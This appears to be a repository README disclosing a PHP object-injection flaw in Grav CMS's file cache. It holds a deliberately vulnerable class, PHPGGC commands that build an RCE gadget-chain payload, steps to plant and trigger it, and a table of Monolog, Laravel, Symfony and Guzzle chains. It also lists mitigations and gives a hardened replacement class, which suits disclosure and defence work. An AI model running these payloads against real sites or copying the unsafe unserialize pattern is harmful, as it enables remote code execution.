devsamuelsantiago/grav-cms-filecache-object-injection
Grav CMS FileCache Object Injection

Description

The FileCache::doGet() method deserializes cache values with unserialize(..., ['allowed_classes' => true]), so any class can be instantiated from a cache file an attacker controls.[web:12]

Impact

  • Arbitrary object injection
  • Remote code execution via PHP gadget chains
  • Access to sensitive properties/magic methods
  • Privilege escalation in PHP applications

Affected Versions

Attack Scenario

  1. The cache directory has insecure permissions (e.g. /tmp/cache/ writable by other users)
  2. The attacker writes a malicious serialized cache file
  3. The application calls FileCache::get() → triggers unserialize
  4. The malicious object's magic methods execute the payload

PoC Demonstration

1. Vulnerable Setup

<?php
// vulnerable.php
class VulnerableFileCache {
    private $cacheDir = './cache/';
    
    public function doGet($key) {
        $file = $this->cacheDir . md5($key) . '.cache';
        if (file_exists($file)) {
            $data = file_get_contents($file);
            return unserialize($data, ['allowed_classes' => true]); // VULNERABLE
        }
        return null;
    }
}

$cache = new VulnerableFileCache();
$result = $cache->doGet('test');
var_dump($result);
?>

2. Payload Generator (PHPGGC)

# Install PHPGGC
git clone https://github.com/ambionics/phpggc
cd phpggc
./phpggc monolog/rce1 system "whoami" > payload.ser

3. Deploy Payload

mkdir -p cache/
# Copy the payload byte-for-byte: serialized PHP with protected/private
# properties contains NUL bytes, which echo "$(cat ...)" would strip.
cp payload.ser cache/$(echo -n 'test' | md5sum | cut -d' ' -f1).cache
chmod 666 cache/*.cache  # Insecure permissions

4. Trigger Exploit

php vulnerable.php
# Output: the name of the user running PHP (from whoami), followed by the var_dump of the returned object

Recommended Gadget Chains [web:9][web:18]

  Framework      Command                              Type
  Monolog/RCE1   ./phpggc monolog/rce1 system id      RCE
  Laravel/RCE1   ./phpggc laravel/rce1 system id      RCE
  Symfony/RCE1   ./phpggc symfony/rce1 system id      RCE
  Guzzle/RCE1    ./phpggc guzzle/rce1 system id       RCE

Mitigations

  • Store JSON/primitive types instead of serialized objects
  • Add an integrity check (HMAC) to cache files and verify it before decoding
  • Set cache directory permissions to 0700
  • Use a strict allowlist: ['allowed_classes' => ['SafeClass1', 'SafeClass2']] (or false when no objects are needed)
  • Validate the origin of cache files
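The following is an added example, not code from this repository or from Grav, showing how the first three mitigations combine in a drop-in replacement for the vulnerable cache class above. The class name HardenedFileCache and the CACHE_HMAC_KEY environment variable are assumptions for the illustration.

```php
<?php
// Added example, not the repository's code: a hardened replacement for
// doGet(). Values are stored as JSON (never serialized objects) and each
// file carries an HMAC, so a file written without the key is rejected.
class HardenedFileCache {
    private string $cacheDir;
    private string $hmacKey;
    public function __construct(string $cacheDir, string $hmacKey) {
        $this->cacheDir = rtrim($cacheDir, '/') . '/';
        $this->hmacKey  = $hmacKey;
        if (!is_dir($this->cacheDir)) {
            mkdir($this->cacheDir, 0700, true); // owner-only directory
        }
    }
    private function path(string $key): string {
        return $this->cacheDir . hash('sha256', $key) . '.cache';
    }
    public function set(string $key, $value): void {
        $json = json_encode($value, JSON_THROW_ON_ERROR);
        $mac  = hash_hmac('sha256', $json, $this->hmacKey);
        // Write "<hex mac>\n<json>" to a temp file, then rename atomically.
        $tmp = $this->path($key) . '.' . bin2hex(random_bytes(4));
        file_put_contents($tmp, $mac . "\n" . $json, LOCK_EX);
        chmod($tmp, 0600);
        rename($tmp, $this->path($key));
    }

    public function doGet(string $key) {
        $file = $this->path($key);
        if (!is_file($file)) {
            return null;
        }
        $data = file_get_contents($file);
        $nl   = strpos($data, "\n");
        if ($nl === false) {
            return null; // malformed file
        }
        $mac  = substr($data, 0, $nl);
        $json = substr($data, $nl + 1);
        // Constant-time check: a forged or tampered file fails before decoding.
        if (!hash_equals(hash_hmac('sha256', $json, $this->hmacKey), $mac)) {
            return null;
        }
        // json_decode() cannot instantiate classes, unlike unserialize().
        return json_decode($json, true, 512, JSON_THROW_ON_ERROR);
    }
}
$cache = new HardenedFileCache('./cache', getenv('CACHE_HMAC_KEY') ?: 'dev-only-key');
$cache->set('test', ['user' => 'alice', 'roles' => ['editor']]);
var_dump($cache->doGet('test'));
```

With this class in place of VulnerableFileCache, the phpggc cache file from the PoC is rejected at the HMAC check and doGet() returns null instead of executing the gadget chain.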

References

